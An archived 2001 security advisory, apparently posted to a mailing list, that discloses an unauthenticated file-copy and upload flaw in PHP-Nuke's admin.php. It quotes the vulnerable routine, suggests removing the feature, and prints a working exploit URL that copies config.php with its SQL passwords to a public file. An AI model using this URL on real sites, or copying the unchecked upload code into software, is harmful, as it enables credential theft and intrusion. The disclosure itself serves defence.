OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: supergatetwlc.net
Date: Mon Sep 24 2001 - 14:31:16 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    twlc security divison
    24/09/2001

    Php nuke BUGGED.

    Found by:
    LucisFero and supergate
    ./twlc

    Summary
    This time the bug is really dangerous...it allows you to 'cp' any file on
    the box... or even upload files...

    Systems Affected
    all the versions ARE vulnerable
    except '5.0 RC1' (i wonder why a released c. is ok while the final 5.2 is
    bugged)

    Explanation
    Do you need sql password?

    http://www.server.net/admin.php?upload=1&file=config.php&file_name=hacked.tx
    t&wdir=/images/&userfile=config.php&userfile_name=hacked.txt

    the admin 'login' page will be prompted just go to
    http://www.server.net/images/hacked.txt and you will see config.php that as
    everyone knows contain the sql's passwords, you can even upload files...i
    leave you the 'fun' to find all the ways to use it... and try to dont be a
    SCRIPT KIDDIE we wrote this advisory to help who runs php nuke and NOT TO
    LET YOU HAVE FUN.

    let me explain you the bug... admin.php contains this routine:

    $basedir = dirname($SCRIPT_FILENAME);
    $textrows = 20;
    $textcols = 85;
    $udir = dirname($PHP_SELF);
    if(!$wdir) $wdir="/";
    if($cancel) $op="FileManager";
    if($upload) {
        copy($userfile,$basedir.$wdir.$userfile_name);
        $lastaction = ""._UPLOADED." $userfile_name --> $wdir";
        // This need a rewrite -------------------------------------> OMG! WE
    AGREEEEEEEE lmao
        //include("header.php");
        //GraphicAdmin($hlpfile);
        //html_header();
        //displaydir();
        $wdir2="/";
        chdir($basedir . $wdir2);
        //CloseTable();
        //include("footer.php");
        Header("Location: admin.php?op=FileManager");
        exit;
    }

    that doesnt do a check to see if you are logged as admin or no... so you can
    use it anyway...

    Solution
    we erased the function... cause we wanted to remove the file manager anyway
    but i suggest you to do the same... -to upload files use FTP-

    conclusions:
    yet another bug of php nuke... this software is used by thousands of
    people... (we run something based on it too) i hope that this time the
    author will reply soon and will release a patch too! as i said before just
    dont try to be a script kiddie or we simply WONT post anymore this kind of
    advisories. Prolly the funny thing is that who first discovered the bug was
    LucisFero that... 2 hours before didnt knew php ... so i (supergate) fear
    him and you should too.

    posted at:
    http://www.twlc.net article http://www.twlc.net/article.php?sid=421
    bugtraqsecurityfocus.com
    http://www.phpnuke.org -good luck-
    http://sourceforge.net/tracker/?group_id=7511 Project: PHP-Nuke Web Portal
    System
    and of course mailed to the author of php nuke

    contacts (bugs, ideas, insults, cool girls... remember that trojans are
    directed to /dev/null):

    lucisferotwlc.net
    supergatetwlc.net

    http://www.twlc.net (yes we are patched)

    peace out pimps. bella a tutti.

    eof